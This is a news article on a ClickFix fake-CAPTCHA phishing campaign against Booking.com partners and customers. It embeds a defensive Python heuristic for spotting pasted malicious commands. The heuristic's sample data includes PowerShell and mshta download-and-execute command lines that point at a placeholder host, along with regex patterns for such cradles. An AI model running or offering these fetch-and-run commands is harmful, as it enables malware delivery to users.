Booking.com Confirms Password Scam Targeting Customers and Partners

Booking.com has confirmed that a sophisticated phishing scam, involving an infostealer malware campaign, has impacted a portion of its accommodation partners and customers. The scam, identified by Microsoft Threat Intelligence, uses fake CAPTCHA tests—part of the so-called ClickFix threat—to trick victims into executing malicious code that ultimately compromises their account credentials and financial data.

A Global Campaign by the Storm-1865 Group

The phishing campaign, attributed to the Storm-1865 group, employs a variety of deceptive lures. Emails purporting to originate from Booking.com have been sent to individuals working in the hospitality industry across North America, Oceania, South and Southeast Asia, and Europe. The fraudulent messages range from prompts about account verification and payment issues to notifications about guest reviews or promotional opportunities.

Microsoft Threat Intelligence analysts explained that these emails display fake error messages or prompts designed to exploit human problem-solving tendencies. By instructing targets to copy, paste, and execute specific commands, the attackers trick users into downloading malware. This user-interactive element allows the threat to bypass many conventional and automated security measures.
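Because the final step of a ClickFix lure is the victim pasting and running a command by hand, the resulting process tree looks different from normal administrative scripting: a script host starts from an interactive parent (the desktop shell or a browser) rather than from a scheduler or service, and its command line usually contains a web download or a hidden-window or encoded-command flag. The following detection sketch, added here as an example and not code from Microsoft Threat Intelligence or Booking.com, runs that heuristic over a few constructed process-creation events in a Sysmon-like shape (the field names `parent`, `image` and `cmdline`, the sample values and the `example.invalid` host are all assumptions made for the illustration):

```python
import re

# Constructed sample process-creation events (hypothetical data, not logs
# from the incident in the article). Each dict mimics the fields a Sysmon
# EventID 1 record would supply after normalisation.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"iex (iwr 'http://example.invalid/x')\""},
    {"parent": "chrome.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/verify.hta"},
    {"parent": "services.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe readme.txt"},
]

# Parents that indicate a user-driven launch (desktop shell or browser).
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Script and scripting-host binaries a pasted command typically invokes.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line traits that are rare in legitimate hand-typed commands
# but common in download cradles: a URL, a web-fetch-and-evaluate cmdlet,
# an encoded command, or a request to hide the console window.
SUSPICIOUS_PATTERNS = [
    ("url", re.compile(r"https?://", re.I)),
    ("web-fetch-eval", re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest)\b", re.I)),
    ("encoded-command", re.compile(r"-(enc|encodedcommand|e)\b", re.I)),
    ("hidden-window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
]


def score_event(event):
    """Return the list of reasons an event looks like a pasted ClickFix
    command, or an empty list if it does not meet the heuristic."""
    parent = event["parent"].lower()
    image = event["image"].lower()
    if parent not in INTERACTIVE_PARENTS or image not in SCRIPT_HOSTS:
        return []
    reasons = [f"{image} launched from interactive parent {parent}"]
    for name, pattern in SUSPICIOUS_PATTERNS:
        if pattern.search(event["cmdline"]):
            reasons.append(f"command line has {name} indicator")
    # An interactive launch alone is normal (users do open PowerShell);
    # require at least one command-line indicator as well.
    return reasons if len(reasons) > 1 else []


def find_clickfix_candidates(events):
    """Return (index, reasons) for every event that trips the heuristic."""
    hits = []
    for idx, event in enumerate(events):
        reasons = score_event(event)
        if reasons:
            hits.append((idx, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['cmdline']}")
        for reason in reasons:
            print(f"   - {reason}")
```

On the sample data the first two events are flagged (shell or browser parent plus a URL or download cradle on the command line), while the scheduled backup script and the ordinary notepad launch are not. In a real deployment the heuristic would be fed from the endpoint telemetry pipeline and tuned against the organisation's own baseline of interactive PowerShell use; the parent-process test is what separates this user-driven pattern from the service-launched scripting that automated controls already expect.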

Booking.com’s Response

In a statement issued by a Booking.com spokesperson, the company confirmed that while its systems have not been breached, some of its accommodation partners and customers have unfortunately been affected by the phishing attacks. “Phishing attacks by criminal organizations pose a significant threat to many industries,” the spokesperson said. “While we can confirm that Booking.com’s systems have not been breached, we are aware that unfortunately some of our accommodation partners and customers have been impacted by phishing attacks sent by professional criminals.”

Booking.com emphasized that the number of affected accommodations represents only a small fraction of those using its platform. The company is actively investing in enhanced cybersecurity measures and continues to provide education and resources to help its partners and customers stay protected. Customers are advised to verify any payment messages by checking the details on their booking confirmations, and to report any suspicious communications immediately through official Booking.com channels.

Staying Vigilant Against Cyber Threats

As cybercriminals employ increasingly sophisticated tactics, experts warn that vigilance remains key. The fake CAPTCHA technique used in this scam is particularly dangerous because it leverages normal user interactions, such as typing commands, to facilitate the download of malware.

Booking.com reiterated its commitment to customer and partner safety, stating: “We urge our customers and partners to remain vigilant. If you encounter any communication that seems suspicious or requests sensitive information through unofficial channels, please do not engage. Report it immediately to our customer service team through official Booking.com channels.” The company’s Trust and Safety Resource Center provides further guidance on recognizing and avoiding phishing attempts.

This latest incident underscores the growing challenge of cybersecurity in an interconnected world and the importance of robust, proactive defense measures to protect personal and financial data from evolving threats.
